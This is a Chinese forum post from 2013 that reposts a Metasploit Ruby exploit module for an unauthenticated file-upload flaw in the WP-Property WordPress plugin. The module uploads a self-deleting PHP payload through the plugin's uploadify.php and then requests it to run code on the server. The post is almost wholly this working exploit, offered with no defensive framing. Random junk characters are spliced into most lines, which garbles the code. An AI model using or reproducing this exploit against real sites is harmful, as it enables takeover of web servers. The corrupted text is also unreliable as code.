WordPress WP-Property PHP 文件上传漏洞
' @9 K4 o! A1 V5 d/ z2 j* G' L& p3 d( g- o `
## # This file is part of the Metasploit Framework and may be subject to
) ^0 f0 T* N' q; @6 K- o! C1 R! y- `% P
' q3 ]' t+ e* h/ [# M! D; J1 g* t) `# redistribution and commercial restrictions. Please see the Metasploit8 {& S, s& Q& b2 M5 J
: y; `: t1 y7 T- }, W3 l# Framework web site for more information on licensing and terms of use., ~* g {3 K- ^) k4 B) Y9 T% o
3 O% [- j5 E: F: [" x/ I3 R4 V9 ]# http://metasploit.com/framework/ ##
1 y% R( L+ P/ P0 @& u( F7 j6 l' U+ t, g5 C" [
) q# b5 A! S- w3 @# s! H. V
3 h2 g* b8 q! v' W$ d. K+ t
# H% j* n/ G" w X
{) O1 x. s7 C# D
require 'msf/core'5 \+ ^) u+ o' N4 J, {% {) {. h
require 'msf/core/exploit/php_exe'
# R+ m6 o) t, a$ D9 H4 `1 L
- {6 S, V1 H9 T0 `+ Uclass Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit: hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',/ G1 r: n' c# `2 z' f! M
'Description' => %q{ Q5 M% z9 q; V( c
This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' =>, x* G0 ~9 B4 i' d+ s+ o$ r
[# H1 v: s! l9 R' c
'Sammy FORGIT', # initial discovery( `" x5 I" `; ^% ~& P4 v) d/ z
'James Fitts <fitts.james[at]gmail.com>' # metasploit module8 G. W: N) g7 `# J
],# Z, p# p4 C1 J- e& k N6 l
'License' => MSF_LICENSE,
! g: j1 C" e2 E* H2 e; v4 B" G, }2 g'References' =>
, Z! Y# r; t- d) l! v# l[
" K3 O X- j, t% b+ D[ 'OSVDB', '82656' ],6 a5 u6 i2 R7 _/ b; d1 S" f
[ 'BID', '53787' ],
/ G3 l) J8 N: {' ]$ [7 L8 J[ 'EDB', '18987'],8 _6 O$ g+ T+ d$ r" F {! n
[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
- @6 _8 Q- C6 d7 a7 Y0 X8 q' `],2 ]5 V! y, M0 W6 E# T9 P/ s( _
'Payload' =>) ]$ ]8 K; N( r, B
{
# s' M+ E& z$ y: k, u, A+ @4 S'BadChars' => "\x00",
4 R4 i# w1 X5 u, p. \' e( o},
2 B0 F# _5 e- y'Platform' => 'php',1 y! ^- G3 w1 m( ]' @
'Arch' => ARCH_PHP,
3 |* F: K9 [, Z, @6 k1 s: V0 y- T'Targets' =>/ Y' s6 }/ [+ k( g
[
, {+ w5 M8 ]" f, j8 f1 Y0 _[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
5 F" b2 g/ Y6 [7 I[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]7 A/ I" I. W. M1 w, L' o
],5 Z' g7 Q6 C# z# O" g% L
'DefaultTarget' => 0,
5 a( s1 ]* n$ b* H'DisclosureDate' => 'Mar 26 2012'))" n2 q" O1 a' X) h
3 _# n' a7 Y2 x; }! aregister_options(9 @) J. ?" U8 L0 {7 Z. L
[
$ D- M: W) I: k4 b2 FOptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
" c+ T" b4 s6 e], self.class)
5 D& F. @$ @1 B# T9 o: R2 Q% O0 D, D. |end
, W, I5 i* n" h( @% U" V
5 D2 _% F, J. ^+ x ndef check
) a2 v, D1 \# [% furi = target_uri.path1 s1 B' C p6 H) i7 o
uri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET',
* \9 s9 z6 u" L) z; t( g _'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
& x- c! T* O0 F+ U8 c& e})3 P/ H) _" [& r
9 q) P, ^$ n# l' h% U
if not res or res.code != 2002 A% K0 I. |" r, w) H( J6 K
return Exploit::CheckCode::Unknown) o) I7 B; F7 I$ b+ D4 a! o
end
$ A, N) ~# M( q3 S/ R
) f' ~! j6 [' l; _# I1 d8 Hreturn Exploit::CheckCode::Appears
$ C8 x+ O) T4 @8 Oend
5 M8 z8 z- j L2 |( E
" v8 c3 f, q! i- gdef exploit' G& E5 M% q9 G( Y
uri = target_uri.path; T- h2 O* n2 `7 g$ H: J- H* w
uri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true)2 w$ ^& R2 A# V Y! H5 I0 N0 s
' N. Y; i- p% p8 E; H' k$ j9 l: F; r8 i
data = Rex::MIME::Message.new
) R. f) k9 ]2 F! D7 [+ c& ^2 _data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
- j/ q% U2 A- X2 K( ?" _/ zdata.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
0 O3 e. U5 E- E; A/ Kpost_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
* D3 [, w: {, D# B" W! V, d: D+ W
print_status("#{peer} - Uploading payload #{@payload_name}")
* \9 v* y& W7 Ires = send_request_cgi({, ?+ W7 g1 p5 T% f
'method' => 'POST',
( h/ [4 ~ V V6 r& v'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
0 B# \0 i4 m- d0 a'ctype' => "multipart/form-data; boundary=#{data.bound}",
7 ^& h% x* p0 @, v! O- T'data' => post_data
, ?+ p3 x' U' B})
4 {7 m! m6 C6 T" ^: \& e& f! Z7 a) f" c h
if not res or res.code != 200 or res.body !~ /#{@payload_name}/# r# ]; W% g) e* i
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")- }6 _ {5 }* w p
end# v/ Z- n/ {$ u7 y
p4 a9 `/ s3 w3 k* z- dupload_uri = res.body0 X+ S, |6 z1 @* ?, S P9 O# j
5 d0 U% {+ x8 a: e
print_status("#{peer} - Executing payload #{@payload_name}")
, A3 @2 W n4 T9 Z ~' r. Ores = send_request_raw({0 e4 h: e- m+ ^ O. K2 \6 f1 d
'uri' => upload_uri,
) T" e, |- B0 b3 Q'method' => 'GET'
" f0 s W2 Q% f: r! T3 v})
1 L, w# t& k4 L3 zend) V, L3 }8 A5 K6 \. t
end! F2 W; s/ W/ F* X
6 ^* w; w! z9 V6 }# D5 s不要问我这写的是什么 怎么利用 我是说msf.1 Y) ]4 `5 S# r. V/ I
; d9 w7 r0 ?! H0 x& p |
发表于 2013-1-4 19:51:30
收藏
支持
反对